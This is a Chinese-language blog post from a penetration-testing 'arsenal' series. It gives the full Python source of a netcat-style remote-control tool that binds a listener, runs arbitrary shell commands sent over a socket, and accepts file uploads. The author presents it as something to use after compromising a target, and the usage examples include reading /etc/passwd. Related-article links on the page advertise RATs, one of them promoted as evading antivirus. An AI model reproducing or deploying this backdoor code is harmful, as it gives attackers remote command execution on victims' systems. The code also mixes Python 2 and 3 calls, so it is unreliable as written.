#我的武器库系列#之远控核心实现

最新推荐文章于 2024-09-29 14:55:07 发布
最新推荐文章于 2024-09-29 14:55:07 发布
阅读量262 收藏
点赞数
分类专栏: python 渗透攻击 文章标签: 渗透攻击 python远控 我的武器库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a59a59/article/details/94147137
版权

       相信多数渗透人员在初级阶段更多通过已有工具(metasploit、nmap、nessus等等)实现对目标系统渗透,这可以让我们注意力更多的放在如何去渗透目标,但工具不能解决所有问题,针对于特殊情况,我们需要编写代码,构造具有针对性脚本进行渗透。

       #我的武器库系列#其目的是自我学习过程中,对已有知识重新梳理,新知识加强固化。系列将不定时更新,语言以python为主,内容包括:远控、代理、抓包分析(基于python、c的两种实现方式)、arp投毒、arp欺骗等等。

   一、远控代码实现原理

      远控的重要性不言而喻,渗透人员渗透成功后,可以通过远控进行一系列操作,本文远控代码分为,客户端、服务端、命令执行等三个核心方法。1.首先启动服务端绑定IP与端口;2.通过客户端连接服务端;3.客户端向服务端发送shell指令。

   二、远控代码

#!/usr/bin/python3.6
#coding:utf-8
import sys;
import socket;
import getopt; #专门用来处理命令行参数,如:netcat.py -t 192.168.1.10 -p 5555 -l -c
import threading;
import subprocess;#开启子进程
#全局变量定义
listen = False; #监听
command = False; #命令
upload = False; #上传
excute = ""; #执行
target = ""; #目标
upload_destination = ""; #上传路径
port = 0;

#帮助
def usage():
    print("*************************************");
    print("NET 工具      ");
    print("使用 netcat.py -t target_host -p port");
    print("-l --listien [host]:[port] 连接");
    print("-e --execute=file_to_run 执行的文件");
    print("-c --command 命令");
    print("-u --upload=destination 上传路径");
    print("");
    print("");
    print("例子");
    print("netcat.py -t 192.168.1.10 -p 5555 -l -c");
    print("netcat.py -t 192.168.1.10 -p 5555 -l -u=c:\\test.ext");
    print("netcat.py -t 192.168.1.10 -p 5555 -l -e=\"cat /etc/passwd\"");
    print("echo 'ABCDE' | ./netcat.py -t 192.168.1.10 -p 123");
    print("*************************************");
    sys.exit(0);
#客户端
def client_sender(buffer):
    print(buffer+"<----");
    client = socket.socket(socket.AF_INET,socket.SOCK_STREAM);#IPV4,TCP
    try:
        client.connect((target,int(port))); #连接
        if len(buffer):
            client.send(buffer);
        while True:
            recv_len = 1;
            response = "";
            while recv_len:
                data = client.recv(4096); #读取数据
                recv_len = len(data); #计算长度
                response += data;
                if recv_len < 4096:
                    break;
            print(response);
            #等待更多的输入
            buffer = raw_input("<NETCAT:#>");
            print("客户端发送数据::"+buffer);
            buffer += "\n";
            client.send(buffer);
    except Exception as e:
        print ("异常退出!");
        print(e);
        client.close();

#执行命令
def run_command(command):
    #换行, 删除 command 字符串末尾的指定字符(默认为空格).
    command = command.rstrip();
    try:
        #返回的是子程序的执行结果
        output = subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True);
        if len(output) == 0:
            output = "success";
    except:
        output = "错误的指令\r\n";
    return output;
#服务端处理方法
def client_handler(client_socket):
    global upload;
    global excute;
    global command;
    #检测要上传的文件
    if len(upload_destination):
        #读取文件字符
        file_buffer = "";
        while True:
            data = client_socket.recv(1024); #服务端获取内容
            if not data:
                break;
            else:
                file_buffer += data;
        try:
            #打开文件,将file_buffer内容写到文件中,关闭连接
            file_descriptor = open (upload_destination,"wb");
            file_descriptor.write(file_buffer);
            file_descriptor.close();
            client_socket.send("文件已上传");
        except:
            client_socket.send("写文件失败");
    if len (excute):
        output = run_command(excute);
        client_socket.send(output);
    if command:
        client_socket.send("连接成功..");
        while True:
            cmd_buffer = "";
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024);#获取指令
                response = run_command(cmd_buffer); #执行指令
                client_socket.send(response);

#服务端
def server_loop():
    global target;
    if not len(target):
        target = "0.0.0.0"; #如果没有,监听所有接口
    server = socket.socket(socket.AF_INET,socket.SOCK_STREAM);#IPV4,TCP
    server.bind((target,int(port)));#绑定
    server.listen(5); #最大连接数
    while True:
        client_socket,addr = server.accept(); #监听连接
        #创建进程用来处理新的客户端信息,调用client_handler方法
        client_thread = threading.Thread(target=client_handler,args=(client_socket,));
        client_thread.start();

#主方法
def main():
    global listen;
    global port;
    global excute;
    global command;
    global upload_destination;
    global target;
    #获取输入参数,如果没有则进行提示
    if not len(sys.argv[1:]):
        usage();
    #读取命令行内容
    try:
        opts,args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","excute","target","port","command","upload"]);
        #输入示例:python netcat.py -t 192.168.1.102 -p 5555 -e="cat /etc/passwd";输出效果:('-t', '192.168.1.102'), ('-p', '5555'), ('-e', '=cat /etc/passwd')]
    except getopt.GetoptError as err:
        print(str(err));
        usage();
    for o,a in opts:
        if o in ("-h","--help"):
            usage();
        elif o in ("-l","--listen"):
            listen = True;
        elif o in ("-e","--excute"):
            excute = True;
        elif o in ("-c","--commandshell"):
            command = True; 
        elif o in ("-u","--upload"):
            upload_destination = a; 
        elif o in ("-t","--target"):
            target = a; 
        elif o in ("-p","--port"):
            port = a;
        else:
           print("请输入正确指令");
           usage();
    if not listen and len(target) and port > 0:
        #ctrl+d是结束输入,read并不会像input那样遇到回车就返回读取的数据,它会缓存或者 等到ctrl+d再读取数据
        buffer = sys.stdin.read();
        client_sender(buffer);
    if listen:
        server_loop();
main();

服务端启动:python netcat.py -l -t 127.0.0.1 -p 9998 -c

客户端启动:python netcat.py  -t 127.0.0.1  -p 9998

三、说点其它

       多数渗透人员很少对自己编写的工具考虑细节问题,不会过多考虑编写代码、工具的鲁棒性。上文以了解核心实现原理为思想,所以存在很多细节及不当之处需要完善。

登峰造Geek
关注
专栏目录
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
[网络安全自学篇] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解(1)
杨秀璋的专栏
06-19 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第一篇文章主要包括两部分内容,开发环境(VS、编译设置)、基础技术、运行单一实例(互斥对象示例)、DLL延迟加载(skin++换皮肤示例)、资源释放(MFC示例)。希望对您有所帮助~
简单的小远控
01-12
希望能帮助有需要的你 在新的一年 开开心心
远控杂说---总有一款适合你
小英雄颂人头
03-28 2294
前言 我在佛前苦求了几千年神器,愿意用几世换我们一世情缘,希望可以感动上天。 你我相识,我们一同探索开源神器,如果喜欢小编,就赶紧关注我们, 让我们一起成长吧 部分图片 下面的图片展示了一部分远控的图片,里面包含了很多很多好玩有不错的事情。 远控大集合列表 优秀神器大杂烩 https://github.com/quasar/QuasarRAT https://github.co...
Gh0st2023远控RAT:新一代远程控制工具的革新之作
最新发布
gitblog_09773的博客
09-29 782
Gh0st2023远控RAT:新一代远程控制工具的革新之作 Gh0st2023远控RAT资源文件介绍 本仓库提供了一个名为“Gh0st2023远控RAT”的资源文件下载。该资源文件包含了重写的大灰狼远控RAT的核心功能与组件模块,并且经过优化,能够有效免杀主流防病毒软件。 ...
GreenHat远控
04-21
GreenHat远控 壳工具的ZProtect1.6加壳 添加个签名源文件添加了过了360 安全卫士
远控上线
qq_36228487的博客
12-31 535
27.18.169.11---666
JRAT远控
weixin_30414155的博客
11-27 403
JRAT java写的一款远控 可以控制mac os Windows linux 系统 https://share.weiyun.com/21b56e3e5cab4b3f145d7c2330d10760   解压密码123 转载于:https://www.cnblogs.com/ms016/p/7905779.html...
[网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
热门推荐
杨秀璋的专栏
07-27 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第三篇文章主要介绍木马病毒启动技术,包括创建进程API、突破SESSION0隔离、内存加载详解,希望对您有所帮助。
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
远控远控软件
09-22
远控远控软件 帮助你远程管理 相关的pc 你可以不会复杂的命令就可以轻而易举的 实现远控
凡窝GHOST远控(原饭客论坛专用远控
05-13
凡窝GHOST远控(原饭客论坛专用远控
Zero远控_10
12-24
Zero远控 10
Zero远控,VC++6.0完整远控下载
05-13
Zero远控
一款强大的手机远控软件,无需ROOT
12-01
说明:软件安装完后桌面会出现 系统网络服务 的图标,先不要隐藏,设置好邮箱参数,测试下,正常后再进行隐藏!不需要ROOT!!! 注明:邮箱里的SMTP需要在自己邮箱里进行开启,不会的请自行百度!!
寻找C++远控
qq852056282的博客
03-10 775
寻找一个会写远控的人,会写的可以私信我
远控NanoCore RAT样本分析
PwnGuo的博客
06-28 3357
NanoCore RAT是在.Net框架中开发的有名的远控软件,网络环境中大量利用各种手段传播此软件,有时巧妙的构造有效的绕过杀软在进一步通过服务端进行功能模块的更新,深受黑客喜爱,从蜜罐捕获相应的样本做进一步分析。 客户端上线通知,显示主机相关信息: 客户端上线通知 插件功能丰富,键盘监控,实时视频操作,语音,命令行控制等完全控制远程主机。 模块插件 客户端一键生成非常非常方便,...
从零开始做远控 簡介篇 做一个属于你自己的远控
sumkee911‘s coding
12-17 1万+
做一个属于你自己的远控:先对大家说句抱歉,上次答应带大家一起做远控但因为我的个人原因让课程中途断了,这次我答应大家一定要把这教程完成。你在看着课程之前你必须掌握c/c++,qt,win32 api。不用精通,懂就可以了。先向你们简单讲解下什么叫远程控制,就是在别人不知情的情况下控制别人的电脑,也就是间谍软件木马。远程控制里有服务端和客户端,客户端是你偷偷放到被控制人的电脑的间谍程序,他负责接收服务...
Easyx图形库实现C++版魂斗罗游戏源码分享
3. 游戏逻辑设计:游戏开发中的核心环节之一就是逻辑设计,包括角色控制、碰撞检测、得分系统、游戏状态管理等。这部分需要开发者具备良好的逻辑思维和算法基础。 4. 魂斗罗游戏机制:魂斗罗游戏机制涵盖了多个方面...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

登峰造Geek

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值